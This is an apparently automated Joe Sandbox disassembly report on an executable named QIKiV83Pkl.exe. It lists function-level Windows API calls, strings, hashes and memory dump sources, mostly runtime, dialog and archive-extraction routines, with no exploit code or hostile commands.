                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: _memcmp
                • String ID:
                • API String ID: 2931989736-0
                • Opcode ID: aaddb1a09d6d2fc88bc6d67747b6e8d85c13bbbd168d0ed51161af3c3ee5f8df
                • Instruction ID: 917711647aa094cda32b562069f8f24ec5dbc4720a7192030a53b74432f224dd
                • Opcode Fuzzy Hash: aaddb1a09d6d2fc88bc6d67747b6e8d85c13bbbd168d0ed51161af3c3ee5f8df
                • Instruction Fuzzy Hash: 2C21AE7160420EBBEB04BB14CC81E3B77ADFF91788B188128FD59DA302E364ED819791
                APIs
                • GetLastError.KERNEL32(?,008B0EE8,00893E14,008B0EE8,?,?,00893713,00000050,?,008B0EE8,00000200), ref: 00898FA9
                • _free.LIBCMT ref: 00898FDC
                • _free.LIBCMT ref: 00899004
                • SetLastError.KERNEL32(00000000,?,008B0EE8,00000200), ref: 00899011
                • SetLastError.KERNEL32(00000000,?,008B0EE8,00000200), ref: 0089901D
                • _abort.LIBCMT ref: 00899023
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: ErrorLast$_free$_abort
                • String ID:
                • API String ID: 3160817290-0
                • Opcode ID: 92e17c86494b32b91721c52bd572a2288ad8bfe3f82b6c4aa125c038e9212dc7
                • Instruction ID: 64cfc4dc010e3a74ef8b240c8d39eae107cf7b904444af5ba984f27ccdcb92d4
                • Opcode Fuzzy Hash: 92e17c86494b32b91721c52bd572a2288ad8bfe3f82b6c4aa125c038e9212dc7
                • Instruction Fuzzy Hash: 77F02835604E02EBDE22332C6C0AB2B2A2AFFD3760F2D0518F425D3A92EF25C9019456
                APIs
                • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0088D2F2
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0088D30C
                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0088D31D
                • TranslateMessage.USER32(?), ref: 0088D327
                • DispatchMessageW.USER32(?), ref: 0088D331
                • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0088D33C
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                • String ID:
                • API String ID: 2148572870-0
                • Opcode ID: 26a09ed5801098d5eb0d079ea9698d3c571d0d11d32339361472f9cd80e19285
                • Instruction ID: aac68d4a6966627fe77ed15c6783faf0519654110e697e9591355d01b0ba9978
                • Opcode Fuzzy Hash: 26a09ed5801098d5eb0d079ea9698d3c571d0d11d32339361472f9cd80e19285
                • Instruction Fuzzy Hash: 0FF03C72A02619ABCB206BA1EC4DEDBBF6DFF62391F008112F606D2150E6348941CBB1
                APIs
                • _wcschr.LIBVCRUNTIME ref: 0088C435
                  • Part of subcall function 008817AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0087BB05,00000000,.exe,?,?,00000800,?,?,008885DF,?), ref: 008817C2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: CompareString_wcschr
                • String ID: <$HIDE$MAX$MIN
                • API String ID: 2548945186-3358265660
                • Opcode ID: 3ce21cbd09db7d59ba46dc2a7f3bd4b787e269b80cdb4c55bfa24db045eba336
                • Instruction ID: 54bff48affb28de269a9b7bde21c0636de5f3832ad34769ebcaf41e60a91725a
                • Opcode Fuzzy Hash: 3ce21cbd09db7d59ba46dc2a7f3bd4b787e269b80cdb4c55bfa24db045eba336
                • Instruction Fuzzy Hash: ED31B27290020DAADF25FA94CC85FEA77BDFB14314F004066FA14D2094EBB08EC4CB61
                APIs
                • LoadBitmapW.USER32(00000065), ref: 0088ADFD
                • GetObjectW.GDI32(00000000,00000018,?), ref: 0088AE22
                • DeleteObject.GDI32(00000000), ref: 0088AE54
                • DeleteObject.GDI32(00000000), ref: 0088AE77
                  • Part of subcall function 00889E1C: FindResourceW.KERNEL32(0088AE4D,PNG,?,?,?,0088AE4D,00000066), ref: 00889E2E
                  • Part of subcall function 00889E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,0088AE4D,00000066), ref: 00889E46
                  • Part of subcall function 00889E1C: LoadResource.KERNEL32(00000000,?,?,?,0088AE4D,00000066), ref: 00889E59
                  • Part of subcall function 00889E1C: LockResource.KERNEL32(00000000,?,?,?,0088AE4D,00000066), ref: 00889E64
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                • String ID: ]
                • API String ID: 142272564-3352871620
                • Opcode ID: 4c0975ea7cdc458ef3cb52b629d3672b48d2a21aff7df14e197c9eeea2bd1148
                • Instruction ID: 7c36371955236f9a2bfed546313d01742e30f0b5ddd3f9bc44a9f60f07e532bf
                • Opcode Fuzzy Hash: 4c0975ea7cdc458ef3cb52b629d3672b48d2a21aff7df14e197c9eeea2bd1148
                • Instruction Fuzzy Hash: 1E010032541616A7E72077689C05A7FBB6AFB81B42F080212FE40E7291EA728C1197B2
                APIs
                  • Part of subcall function 0087130B: GetDlgItem.USER32(00000000,00003021), ref: 0087134F
                  • Part of subcall function 0087130B: SetWindowTextW.USER32(00000000,008A35B4), ref: 00871365
                • EndDialog.USER32(?,00000001), ref: 0088CCDB
                • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0088CCF1
                • SetDlgItemTextW.USER32(?,00000066,?), ref: 0088CD05
                • SetDlgItemTextW.USER32(?,00000068), ref: 0088CD14
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: ItemText$DialogWindow
                • String ID: RENAMEDLG
                • API String ID: 445417207-3299779563
                • Opcode ID: f6aa4adeeea8d7831de3e9c14c6a9b72ada1845c0522ac71f76a09785ee45163
                • Instruction ID: fda12bcfa739fc583acd53e01abe42c9826589e736173f514b3c442a1df576b7
                • Opcode Fuzzy Hash: f6aa4adeeea8d7831de3e9c14c6a9b72ada1845c0522ac71f76a09785ee45163
                • Instruction Fuzzy Hash: 3B012432285214BED6216F689C08F677B6EFB6AB02F108512F346E20E5C6B1A9058B75
                APIs
                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00897573,00000000,?,00897513,00000000,008ABAD8,0000000C,0089766A,00000000,00000002), ref: 008975E2
                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 008975F5
                • FreeLibrary.KERNEL32(00000000,?,?,?,00897573,00000000,?,00897513,00000000,008ABAD8,0000000C,0089766A,00000000,00000002), ref: 00897618
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AddressFreeHandleLibraryModuleProc
                • String ID: CorExitProcess$mscoree.dll
                • API String ID: 4061214504-1276376045
                • Opcode ID: 60f963c82f3bb48c6e0b4d453f1fc6d5c569afb52cc6fd29c803ac7c0f4b5384
                • Instruction ID: 3ed7c00f057258925b65034a94af66f2c390e6f7cdf9fcbff607f3c9d9693be7
                • Opcode Fuzzy Hash: 60f963c82f3bb48c6e0b4d453f1fc6d5c569afb52cc6fd29c803ac7c0f4b5384
                • Instruction Fuzzy Hash: DBF04431A14618BBEB15AF95DC09B9DBFB9FF05715F044059F805E2550DF748A40CB54
                APIs
                  • Part of subcall function 00880085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 008800A0
                  • Part of subcall function 00880085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0087EB86,Crypt32.dll,00000000,0087EC0A,?,?,0087EBEC,?,?,?), ref: 008800C2
                • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0087EB92
                • GetProcAddress.KERNEL32(008B81C0,CryptUnprotectMemory), ref: 0087EBA2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AddressProc$DirectoryLibraryLoadSystem
                • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                • API String ID: 2141747552-1753850145
                • Opcode ID: f192014346154eb4c2ff8655c64b2ce0fbd227ca21ce4a4f47aeb07fa5c563cc
                • Instruction ID: e308cae258f2db948cd9d4bce4fdac92f187be34ff41eb7c099cd7d349e98a21
                • Opcode Fuzzy Hash: f192014346154eb4c2ff8655c64b2ce0fbd227ca21ce4a4f47aeb07fa5c563cc
                • Instruction Fuzzy Hash: BBE04F71400B41AEEB309F389809B42BEE4FB1A710B04C85DF4E6E3A50D6B8D5449B50
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: _free
                • String ID:
                • API String ID: 269201875-0
                APIs
                • GetEnvironmentStringsW.KERNEL32 ref: 0089B619
                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0089B63C
                  • Part of subcall function 00898518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0089C13D,00000000,?,008967E2,?,00000008,?,008989AD,?,?,?), ref: 0089854A
                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0089B662
                • _free.LIBCMT ref: 0089B675
                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0089B684
                Similarity
                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                • String ID:
                • API String ID: 336800556-0
                APIs
                • GetLastError.KERNEL32(?,008B0EE8,00000200,0089895F,008958FE,?,?,?,?,0087D25E,?,033F3800,00000063,00000004,0087CFE0,?), ref: 0089902E
                • _free.LIBCMT ref: 00899063
                • _free.LIBCMT ref: 0089908A
                • SetLastError.KERNEL32(00000000,008A3958,00000050,008B0EE8), ref: 00899097
                • SetLastError.KERNEL32(00000000,008A3958,00000050,008B0EE8), ref: 008990A0
                Similarity
                • API ID: ErrorLast$_free
                • String ID:
                • API String ID: 3170660625-0
                APIs
                  • Part of subcall function 00880A41: ResetEvent.KERNEL32(?), ref: 00880A53
                  • Part of subcall function 00880A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00880A67
                • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 0088078F
                • CloseHandle.KERNEL32(?,?), ref: 008807A9
                • DeleteCriticalSection.KERNEL32(?), ref: 008807C2
                • CloseHandle.KERNEL32(?), ref: 008807CE
                • CloseHandle.KERNEL32(?), ref: 008807DA
                  • Part of subcall function 0088084E: WaitForSingleObject.KERNEL32(?,000000FF,00880A78,?), ref: 00880854
                  • Part of subcall function 0088084E: GetLastError.KERNEL32(?), ref: 00880860
                Similarity
                • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                • String ID:
                • API String ID: 1868215902-0
                APIs
                • _free.LIBCMT ref: 0089BF28
                  • Part of subcall function 008984DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0089BFA7,008A3958,00000000,008A3958,00000000,?,0089BFCE,008A3958,00000007,008A3958,?,0089C3CB,008A3958), ref: 008984F4
                  • Part of subcall function 008984DE: GetLastError.KERNEL32(008A3958,?,0089BFA7,008A3958,00000000,008A3958,00000000,?,0089BFCE,008A3958,00000007,008A3958,?,0089C3CB,008A3958,008A3958), ref: 00898506
                • _free.LIBCMT ref: 0089BF3A
                • _free.LIBCMT ref: 0089BF4C
                • _free.LIBCMT ref: 0089BF5E
                • _free.LIBCMT ref: 0089BF70
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                APIs
                • _free.LIBCMT ref: 0089807E
                  • Part of subcall function 008984DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0089BFA7,008A3958,00000000,008A3958,00000000,?,0089BFCE,008A3958,00000007,008A3958,?,0089C3CB,008A3958), ref: 008984F4
                  • Part of subcall function 008984DE: GetLastError.KERNEL32(008A3958,?,0089BFA7,008A3958,00000000,008A3958,00000000,?,0089BFCE,008A3958,00000007,008A3958,?,0089C3CB,008A3958,008A3958), ref: 00898506
                • _free.LIBCMT ref: 00898090
                • _free.LIBCMT ref: 008980A3
                • _free.LIBCMT ref: 008980B4
                • _free.LIBCMT ref: 008980C5
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                APIs
                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\QIKiV83Pkl.exe,00000104), ref: 008976FD
                • _free.LIBCMT ref: 008977C8
                • _free.LIBCMT ref: 008977D2
                Similarity
                • API ID: _free$FileModuleName
                • String ID: C:\Users\user\Desktop\QIKiV83Pkl.exe
                • API String ID: 2506810119-2171911237
                APIs
                • __EH_prolog.LIBCMT ref: 00877579
                  • Part of subcall function 00873B3D: __EH_prolog.LIBCMT ref: 00873B42
                • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00877640
                  • Part of subcall function 00877BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00877C04
                  • Part of subcall function 00877BF5: GetLastError.KERNEL32 ref: 00877C4A
                  • Part of subcall function 00877BF5: CloseHandle.KERNEL32(?), ref: 00877C59
                Similarity
                • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                • String ID: SeRestorePrivilege$SeSecurityPrivilege
                • API String ID: 3813983858-639343689
                APIs
                  • Part of subcall function 0087130B: GetDlgItem.USER32(00000000,00003021), ref: 0087134F
                  • Part of subcall function 0087130B: SetWindowTextW.USER32(00000000,008A35B4), ref: 00871365
                • EndDialog.USER32(?,00000001), ref: 0088A4B8
                • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0088A4CD
                • SetDlgItemTextW.USER32(?,00000066,?), ref: 0088A4E2
                Similarity
                • API ID: ItemText$DialogWindow
                • String ID: ASKNEXTVOL
                • API String ID: 445417207-3402441367
                Similarity
                • API ID: __fprintf_l_strncpy
                • String ID: $%s$@%s
                • API String ID: 1857242416-834177443
                APIs
                  • Part of subcall function 0087130B: GetDlgItem.USER32(00000000,00003021), ref: 0087134F
                  • Part of subcall function 0087130B: SetWindowTextW.USER32(00000000,008A35B4), ref: 00871365
                • EndDialog.USER32(?,00000001), ref: 0088A9DE
                • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0088A9F6
                • SetDlgItemTextW.USER32(?,00000067,?), ref: 0088AA24
                Similarity
                • API ID: ItemText$DialogWindow
                • String ID: GETPASSWORD1
                • API String ID: 445417207-3292211884
                APIs
                • _swprintf.LIBCMT ref: 0087B51E
                  • Part of subcall function 0087400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0087401D
                • _wcschr.LIBVCRUNTIME ref: 0087B53C
                • _wcschr.LIBVCRUNTIME ref: 0087B54C
                Similarity
                • API ID: _wcschr$__vswprintf_c_l_swprintf
                • String ID: %c:\
                • API String ID: 525462905-3142399695
                APIs
                • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0087ABC5,00000008,?,00000000,?,0087CB88,?,00000000), ref: 008806F3
                • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0087ABC5,00000008,?,00000000,?,0087CB88,?,00000000), ref: 008806FD
                • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0087ABC5,00000008,?,00000000,?,0087CB88,?,00000000), ref: 0088070D
                Strings
                • Thread pool initialization failed., xrefs: 00880725
                Similarity
                • API ID: Create$CriticalEventInitializeSectionSemaphore
                • String ID: Thread pool initialization failed.
                • API String ID: 3340455307-2182114853
                Similarity
                • API ID:
                • String ID: RENAMEDLG$REPLACEFILEDLG
                • API String ID: 0-56093855
                Similarity
                • API ID: __alldvrm$_strrchr
                • String ID:
                • API String ID: 1036877536-0
                APIs
                • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,008780B7,?,?,?), ref: 0087A351
                • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,008780B7,?,?), ref: 0087A395
                • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,008780B7,?,?,?,?,?,?,?,?), ref: 0087A416
                • CloseHandle.KERNEL32(?,?,00000000,?,008780B7,?,?,?,?,?,?,?,?,?,?,?), ref: 0087A41D
                Similarity
                • API ID: File$Create$CloseHandleTime
                • String ID:
                • API String ID: 2287278272-0
                • Opcode ID: 4d94b44d3ce160c98862a3a7520881580524c48984eab1f6fba311443d4c9c9b
                • Instruction ID: 820e280b4f9c37eefe125baebd82b1533d3109efef213572f6793a0bf1b05d2d
                • Opcode Fuzzy Hash: 4d94b44d3ce160c98862a3a7520881580524c48984eab1f6fba311443d4c9c9b
                • Instruction Fuzzy Hash: 0241CC30248384AAE725DF68CC45BAFBBE8FB81700F04891CB5D8E3295D664DA489B53
                APIs
                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,008989AD,?,00000000,?,00000001,?,?,00000001,008989AD,?), ref: 0089C0E6
                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0089C16F
                • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,008967E2,?), ref: 0089C181
                • __freea.LIBCMT ref: 0089C18A
                  • Part of subcall function 00898518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0089C13D,00000000,?,008967E2,?,00000008,?,008989AD,?,?,?), ref: 0089854A
                Similarity
                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                • String ID:
                • API String ID: 2652629310-0
                • Opcode ID: f2c02052ed1e07623d9af5bb969f04b58148d3f64966ef51fa5df54228345167
                • Instruction ID: f8cc262fc9959b56e22c7d5480da9042508d295b731c6d441e80ac637ee177cd
                • Opcode Fuzzy Hash: f2c02052ed1e07623d9af5bb969f04b58148d3f64966ef51fa5df54228345167
                • Instruction Fuzzy Hash: DE31ED72A0020AABDF25AF69DC85DAE7BA5FB45310F080128FC04D7291EB36CD50CBA0
                APIs
                • ___BuildCatchObject.LIBVCRUNTIME ref: 0089251A
                  • Part of subcall function 00892B52: ___AdjustPointer.LIBCMT ref: 00892B9C
                • _UnwindNestedFrames.LIBCMT ref: 00892531
                • ___FrameUnwindToState.LIBVCRUNTIME ref: 00892543
                • CallCatchBlock.LIBVCRUNTIME ref: 00892567
                Similarity
                • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                • String ID:
                • API String ID: 2633735394-0
                • Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                • Instruction ID: ff7298baedbf8c564f7f6a70680870e98c320352962d23fb174368e2c15e0335
                • Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                • Instruction Fuzzy Hash: FE01E932000109BBCF12AF59DC41EDA3FBAFF58754F198414FD18A6121C376E961EBA1
                APIs
                • GetDC.USER32(00000000), ref: 00889DBE
                • GetDeviceCaps.GDI32(00000000,00000058), ref: 00889DCD
                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00889DDB
                • ReleaseDC.USER32(00000000,00000000), ref: 00889DE9
                Similarity
                • API ID: CapsDevice$Release
                • String ID:
                • API String ID: 1035833867-0
                • Opcode ID: 294034670bb71bec1e3e88a8caece82badf6352fb506aeb0adf0223e129b82ca
                • Instruction ID: 65b31e6d75fc193d3edf245a4cc84d4ae1e812c7bd57ea55dbd95f29d91fc1ff
                • Opcode Fuzzy Hash: 294034670bb71bec1e3e88a8caece82badf6352fb506aeb0adf0223e129b82ca
                • Instruction Fuzzy Hash: 71E0EC31986A21A7D3201BA8AC0DB9F3B58BB19712F054216F60596194DA704805CB94
                APIs
                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00892016
                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 0089201B
                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00892020
                  • Part of subcall function 0089310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0089311F
                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00892035
                Similarity
                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                • String ID:
                • API String ID: 1761009282-0
                • Opcode ID: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                • Instruction ID: f35d8f68d4fcee282de0c7d402aeeb3b53d2714c86e45fb9fb097fee5b58245a
                • Opcode Fuzzy Hash: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                • Instruction Fuzzy Hash: 32C04C24004A44F41C113ABE32021BD2740FC627C4B9E60C2F881D7113DE06061AE077
                APIs
                  • Part of subcall function 00889DF1: GetDC.USER32(00000000), ref: 00889DF5
                  • Part of subcall function 00889DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00889E00
                  • Part of subcall function 00889DF1: ReleaseDC.USER32(00000000,00000000), ref: 00889E0B
                • GetObjectW.GDI32(?,00000018,?), ref: 00889F8D
                  • Part of subcall function 0088A1E5: GetDC.USER32(00000000), ref: 0088A1EE
                  • Part of subcall function 0088A1E5: GetObjectW.GDI32(?,00000018,?), ref: 0088A21D
                  • Part of subcall function 0088A1E5: ReleaseDC.USER32(00000000,?), ref: 0088A2B5
                Similarity
                • API ID: ObjectRelease$CapsDevice
                • String ID: (
                • API String ID: 1061551593-3887548279
                • Opcode ID: f6b6ee944014d2081b4f39e1fe691a603985013bfe476f34758924e183bf464e
                • Instruction ID: 5c9460b74941cb83b8c87f2476d849a1e57f71f602aaf5509b2c956a6a93b01b
                • Opcode Fuzzy Hash: f6b6ee944014d2081b4f39e1fe691a603985013bfe476f34758924e183bf464e
                • Instruction Fuzzy Hash: F2810475208614AFD714DF68C844A6ABBE9FF89705F00491EF98AD7260DB31AE05CB52
                Similarity
                • API ID: _swprintf
                • String ID: %ls$%s: %s
                • API String ID: 589789837-2259941744
                • Opcode ID: e519db9c8d8c7c2dd5f31f53cc6b9be550e08dab0354b26116d5f5fd6fb8cb2e
                • Instruction ID: 188be662c529a83480d7f999cff4a8bfe592206b02336587e28e8525962e3ec3
                • Opcode Fuzzy Hash: e519db9c8d8c7c2dd5f31f53cc6b9be550e08dab0354b26116d5f5fd6fb8cb2e
                • Instruction Fuzzy Hash: 8951963118CB08FAFE713AE4CD46F377669FB14B04F208906B79AE48D6CA9154546B13
                APIs
                • _free.LIBCMT ref: 0089AA84
                  • Part of subcall function 00898849: IsProcessorFeaturePresent.KERNEL32(00000017,00898838,00000050,008A3958,?,0087CFE0,00000004,008B0EE8,?,?,00898845,00000000,00000000,00000000,00000000,00000000), ref: 0089884B
